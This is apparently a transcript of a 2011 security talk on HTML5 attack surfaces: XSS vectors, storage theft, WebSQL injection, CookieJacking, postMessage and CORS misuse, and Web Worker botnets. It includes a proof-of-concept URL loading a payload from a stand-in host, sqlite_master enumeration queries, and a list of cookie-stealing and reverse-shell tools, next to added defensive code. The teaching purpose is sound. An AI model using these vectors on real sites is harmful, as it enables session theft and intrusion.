
Talk about html5 security

ourren
September 15, 2011


html5 security


Transcript

  1.  History
      ▪ HTML 1.0 (1993.6): not a standard
      ▪ HTML 2.0 (1995.11): RFC 1866
      ▪ HTML 3.2 (1996.1.14): W3C Recommended Standard
      ▪ HTML 4.0 (1997.12.18): W3C Recommended Standard
      ▪ HTML 4.01 (1999.12.24): W3C Recommended Standard
      ▪ XHTML (2000.1.20): W3C Recommended Standard
      ▪ HTML5 (2008): first draft standard; 2012: W3C Candidate Recommendation

  2.  Features
      The three aspects of HTML5:
      ▪ Content: HTML (new tags and attributes)
      ▪ Presentation of content: CSS
      ▪ Interaction with content: JavaScript (new APIs: Drag, LocalStorage, WebWorkers, etc.)

  3.  ▪ XSS abuse with tags and attributes
      ▪ Hiding URL code
      ▪ Stealing from the storage
      ▪ Injecting and exploiting WebSQL
      ▪ ClickJacking && CookieJacking
      ▪ Cross Origin Request and postMessage
      ▪ Client-side File Includes
      ▪ Botnet and widgets

  4.  In:
      ▪ New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
      ▪ New attributes for tags: autocomplete, autofocus, pattern (yes, regex) for input
      ▪ New media events
      ▪ New <canvas> tag for 2D rendering
      ▪ New form controls for date and time
      ▪ Geolocation
      ▪ New selectors
      ▪ Client-side storage including localStorage, sessionStorage, and WebSQL
      Out:
      ▪ Presentation elements such as <font>, <center>
      ▪ Presentation attributes including align, border
      ▪ <frame>, <frameset>
      ▪ <applet>
      ▪ Old special effects: <marquee>, <bgsound>
      ▪ <noscript>

  5.  Attack:
      ▪ New XSS vector
      ▪ Bypass black-list filter
      Defense:
      ▪ Add the new tags to the black-list
      ▪ Change the regex

  6.  DOM
      ▪ window.history.back();
      ▪ window.history.forward();
      ▪ window.history.go();
      HTML5
      ▪ history.pushState(stateObject, title, URL);
      ▪ history.replaceState(): the same as pushState, but modifies the current history entry.

  7.  Type
      ▪ LocalStorage: for long-term storage
      ▪ SessionStorage: for the session (lasts until the browser is closed)
      Differences
      ▪ Cookies: 4k
      ▪ LocalStorage / SessionStorage: depends on the browser (usually 5MB)
      Support
      ▪ Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50

  8.  Function
      ▪ (localStorage | sessionStorage).setItem(key, value)
      ▪ (localStorage | sessionStorage).getItem(key)
      ▪ (localStorage | sessionStorage).removeItem(key)
      ▪ (localStorage | sessionStorage).clear()

  9.  Attack
      ▪ Get the data from the storage (cookie, passwd, etc.)
      ▪ Store your XSS shellcode
      ▪ No path restriction
      Defense
      ▪ Don't store sensitive data in local storage
      ▪ Don't use local storage for session identifiers
      ▪ Stick with cookies and use the HttpOnly and Secure flags

  10.  Database Storage
      ▪ The same as Google Gears
      Operate
      ▪ var db = openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");
      ▪ db.transaction(function (tx) {
            tx.executeSql("YOUR SQL STATEMENT HERE", [params], successCallback, errorCallback);
        });
      Type
      ▪ SQLite (supported by WebKit)

  11.  Attack
      ▪ Store shellcode
      ▪ SQL injection
      Defense
      ▪ Be strict with SQL statements (bind parameters with ?)
      ▪ Encode the SQL result before display
      ▪ Don't store sensitive data

  12.  SQL Injection
      Use sqlite_master
      ▪ SELECT name FROM sqlite_master WHERE type='table'
      ▪ SELECT sql FROM sqlite_master WHERE name='table_name'
      ▪ SELECT sqlite_version()
      Select with ?
      ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id);   False (string concatenation, injectable)
      ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True (bound parameter)

  13.  Drag and drop basics
      ▪ Drag data
      ▪ The drag feedback image
      ▪ Drag effects
      Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend

  14.  CookieJacking
      ▪ Uses several techniques to steal the user's local cookies
      Technology
      ▪ How to read the local file: iframe + file://
      ▪ How to detect the state of cookies: Clickjacking
      ▪ How to send cookies: SMB

  15.  Defense
      ▪ Use iframe with sandbox
      ▪ if (top !== window) top.location = window.location.href;
      ▪ if (top != self) top.location.href = self.location.href;

  16.  postMessage
      Send
      ▪ otherWindow.postMessage(message, targetOrigin);
      Receive
      ▪ window.addEventListener("message", receiveMessage, false);
        function receiveMessage(event) {
          if (event.origin !== "http://example.org:8080") return;
          // ...
        }

  17.  Defense
      ▪ Check the postMessage origin
      ▪ Don't use innerHTML
        ▪ Element.innerHTML = e.data;   // danger
        ▪ Element.textContent = e.data; // safe
      ▪ Don't use eval to deal with the message

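
The receiver from slide 16 with the slide-17 rules applied, as an added example that is not part of the deck. The trusted origin, the stand-in element and the constructed message event exist only so the handler can be exercised outside a browser.

```javascript
// Added example (not from the deck): hardened "message" handler for slide 16,
// following slide 17. TRUSTED_ORIGINS, makeElement() and fakeEvent() are
// constructed stand-ins so this runs in Node without a DOM.
const TRUSTED_ORIGINS = new Set(["http://example.org:8080"]);

// Stand-in for a DOM element: we only care which property gets written.
function makeElement() {
  return { innerHTML: "", textContent: "" };
}

// Handles one message event. Returns the accepted text, or null when rejected.
function receiveMessage(event, target, trusted = TRUSTED_ORIGINS) {
  // Exact-match the origin against an allowlist; a substring or regex check
  // would also accept "http://example.org:8080.attacker.example".
  if (!trusted.has(event.origin)) return null;

  // Treat the payload as data, never as code or markup: no eval(), no innerHTML.
  const text = typeof event.data === "string" ? event.data : JSON.stringify(event.data);
  target.textContent = text;

  // When replying, pin targetOrigin to the origin just verified, never "*",
  // so the reply cannot be read by a window that has navigated elsewhere.
  if (event.source && typeof event.source.postMessage === "function") {
    event.source.postMessage({ ok: true, length: text.length }, event.origin);
  }
  return text;
}

// Constructed message event carrying the fields of a real MessageEvent that
// the handler uses; replies sent via event.source are collected in `replies`.
function fakeEvent(origin, data, replies) {
  return {
    origin,
    data,
    source: { postMessage: (msg, targetOrigin) => replies.push({ msg, targetOrigin }) },
  };
}
```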
  18.  Cross-Origin Resource Sharing
      ▪ Originally Ajax calls were subject to the Same Origin Policy
      ▪ Site A cannot make XMLHttpRequests to Site B
      ▪ HTML5 makes it possible to make these cross-domain calls
      ▪ Site A -> Site B (the response must include a header)
      ▪ Access-Control-Allow-Origin: Site A   (must)
      ▪ Access-Control-Allow-Credentials: true | false
      ▪ Access-Control-Expose-Headers:
      ▪ etc.

  19.  Defense
      ▪ Don't set this: Access-Control-Allow-Origin: *   (compare Flash crossdomain.xml)
      ▪ Prevent DDoS
      ▪ if (origin == "Site A") { header("Access-Control-Allow-Origin: Site A"); /* ... process request */ }

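
The origin allowlist that slide 19's if(origin=="Site A") sketch describes, written out as an added example (not the deck's code) as a pure function next to the reflecting variant it replaces. The allowlisted origins are constructed sample values.

```javascript
// Added example (not from the deck): CORS response headers from an origin
// allowlist, as slide 19 intends. ALLOWED_ORIGINS holds constructed sample values.
const ALLOWED_ORIGINS = new Set(["https://site-a.example", "https://app.site-a.example"]);

// Computes the CORS headers for a request carrying the given Origin header.
// Returns {} when the origin is not allowed: with no Access-Control-Allow-Origin
// the browser blocks the response and never exposes it to the calling page.
function corsHeadersFor(requestOrigin, opts = {}) {
  const { withCredentials = false, allowed = ALLOWED_ORIGINS } = opts;
  // Exact match only. The browser sends Origin normalised to scheme://host[:port],
  // so a Set lookup is enough; a suffix check such as endsWith("site-a.example")
  // would also admit https://evil-site-a.example.
  if (typeof requestOrigin !== "string" || !allowed.has(requestOrigin)) return {};
  const headers = {
    // Echo the single verified origin back instead of "*".
    "Access-Control-Allow-Origin": requestOrigin,
    // The response now differs per origin, so shared caches must key on it.
    "Vary": "Origin",
  };
  if (withCredentials) {
    // Browsers reject "*" together with credentials, one more reason not to use it.
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// The weak variant slide 19 warns against, in its common disguise: reflecting
// whatever Origin arrives. With credentials this is "*" plus cookies, and any
// site can read the authenticated response.
function reflectingCorsHeaders(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}
```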
  20.  Code like this:
      <html><body><script>
      x = new XMLHttpRequest();
      x.open("GET", location.hash.substring(1));
      x.onreadystatechange = function () {
        if (x.readyState == 4) {
          document.getElementById("main").innerHTML = x.responseText;
        }
      };
      x.send();
      </script>
      <div id="main"></div>
      </body></html>
      POC
      ▪ Introducing Cross Origin Requests: http://example.com/#http://evil.site/payload.php
      ▪ Contents of 'payload.php' will be included as HTML within <div id="main"></div>
      ▪ New type of XSS!!

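
One way to harden the include pattern on slide 20, as an added example that is not the deck's code: resolve the fragment with the WHATWG URL parser the same way XMLHttpRequest.open() would, then refuse anything that is not a same-origin, allowlisted path. The page origin and the allowlist of fragment paths are constructed values.

```javascript
// Added example (not from the deck): validating location.hash before using it
// as an XHR target. PAGE_ORIGIN and ALLOWED_FRAGMENTS are constructed values;
// the URL global exists in browsers and Node, so this runs without a DOM.
const PAGE_ORIGIN = "http://example.com";
const ALLOWED_FRAGMENTS = new Set(["/fragments/news.html", "/fragments/about.html"]);

// Turns location.hash into a same-origin path the page may fetch, or null.
function resolveIncludeTarget(hash, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_FRAGMENTS) {
  const raw = hash.startsWith("#") ? hash.slice(1) : hash;
  if (raw === "") return null;
  let url;
  try {
    // Resolve relative to the page, exactly as XMLHttpRequest.open() would.
    url = new URL(raw, pageOrigin);
  } catch (e) {
    return null; // unparsable fragment
  }
  // Absolute URLs (#http://evil.site/payload.php), protocol-relative ones
  // (#//evil.site/x) and javascript: URLs all resolve to a different origin.
  if (url.origin !== pageOrigin) return null;
  // The parser normalises traversal ("/fragments/../admin.html" becomes
  // "/admin.html"), so the allowlist check sees the real target path.
  if (!allowed.has(url.pathname)) return null;
  return url.pathname;
}

// Replacement for the slide's readyState handler: the fetched fragment is
// inserted as text by default; only a caller that knows the fragment is
// server-controlled HTML opts into innerHTML.
function renderInclude(element, responseText, trustedHtml = false) {
  if (trustedHtml) element.innerHTML = responseText;
  else element.textContent = responseText;
  return element;
}
```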
  21.  Web Workers
      ▪ Running scripts in the background independently
      ▪ Very simple:
        var w = new Worker("some_script.js");
        w.onmessage = function (e) {
          // do something
        };
        w.terminate();
      Access
      ▪ XHR, navigator object, application cache, spawn other workers!
      Can't access
      ▪ DOM, window, document objects

  22.  Attack
      Botnet
      ▪ Application-level DDoS attacks
      ▪ Email spam
      ▪ Distributed password cracking
      Network scanning
      ▪ Guessing the user's private IP address
      ▪ Identify the user's subnet
      ▪ Identify the IP address

  23.  HTML5CSdump
      ▪ Uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a given domain name
      JS-Recon
      ▪ Port scans
      ▪ Network scans
      ▪ Detecting the private IP address

  24.  Imposter
      ▪ Steal cookies
      ▪ Set cookies
      ▪ Steal Local Shared Objects
      ▪ Steal stored passwords from Firefox
      ▪ etc.
      Shell of the Future
      ▪ Reverse Web Shell handler
      ▪ Bypass anti-session hijacking measures

  25.  Ravan
      ▪ JavaScript based distributed computing system
      ▪ Hashing algorithms: MD5, SHA1, SHA256, SHA512

  26.  ▪ New security threats brought by HTML5: xisigr
      ▪ Attacking with HTML5: lavakumark
      ▪ Abusing HTML5: Ming Chow
      ▪ HTML5 Web Security: Thomas Röthlisberger
      ▪ Abusing HTML 5 Structured Client-side Storage: Alberto Trivero
      ▪ Cookiejacking: Rosario Valotta
      ▪ http://heideri.ch/jso/#html5
      ▪ http://www.wooyun.org/bugs/wooyun-2011-02351
      ▪ http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-dom-l3-top-10-attacks.html
      ▪ http://www.html5test.com

  27.  ▪ http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
      ▪ http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox
      ▪ http://code.google.com/intl/zh-CN/apis/gears/api_database.html
      ▪ http://michael-coates.blogspot.com/2010/07/html5-local-storage-and-xss.html
      ▪ http://www.w3.org/TR/access-control/
      ▪ http://m-austin.com/blog/?p=19
      ▪ https://developer.mozilla.org/en/
      ▪ http://www.w3.org/TR/cors/
      ▪ http://www.andlabs.org/tools/ravan.html
      ▪ http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/